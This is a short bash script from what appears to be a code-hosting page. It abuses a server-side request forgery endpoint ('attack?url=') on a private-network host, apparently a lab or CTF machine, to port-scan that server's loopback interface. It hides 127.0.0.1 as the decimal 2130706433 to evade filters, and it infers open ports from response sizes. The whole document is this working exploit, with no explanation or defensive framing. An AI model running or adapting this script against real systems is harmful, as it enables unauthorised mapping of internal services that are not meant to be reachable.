9 lines
237 B
Bash
9 lines
237 B
Bash
|
#!/usr/bin/env bash
|
||
|
for x in {1..65535};
|
||
|
do cmd=$(curl -so /dev/null http://10.10.214.67:8000/attack?url=http://2130706433:${x} \
|
||
|
-w '%{size_download}');
|
||
|
if [ $cmd != 1045 ]; then
|
||
|
echo "Open port: $x"
|
||
|
fi
|
||
|
done
|